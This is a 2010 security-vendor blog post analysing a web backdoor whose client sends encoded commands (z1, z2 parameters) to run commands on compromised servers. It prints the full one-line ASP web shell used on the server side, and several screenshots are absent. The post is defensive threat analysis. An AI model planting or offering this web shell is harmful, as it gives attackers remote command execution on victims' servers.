June 30, 2010

Analysis of a backdoor's communication process

Lei Li

Websense Security Labs™ ThreatSeeker™ Network has detected a backdoor written by a Chinese hacker spreading in the wild.  In this blog we shall explore what actions are possible with such a backdoor.

The controller client of the backdoor can explore and modify all files on a compromised server:


Also, hackers can use a client to run commands on the compromised server:

With the powerful client side, the server side only needs a few code lines written in ASP or PHP, so it can easily be injected into a Web page by SQL injection or other hack technology.  The source code of the server side looks like this: 

<%eval request("hack")%>

By capturing the network traffic packages, we can see what the backdoor did. Here is an example:


The client side generates an encoded command string as a post request to the server. The string is:


After decoding this, we can see how to run a command on the compromised server:

The parameter z1 is "cmd", which opens a command line on the server side, and the parameter z2 is:

Following the request, the server response is to list all files in the current folder:

The above shows the running of a "dir" command on a compromised server. Hackers can run almost all commands on a server from the client side by using this method.


Websense Messaging and Websense Web Security customers are protected against these attacks.

About Forcepoint

Forcepoint is the leading user and data protection cybersecurity company, entrusted to safeguard organizations while driving digital transformation and growth. Our solutions adapt in real-time to how people interact with data, providing secure access while enabling employees to create value.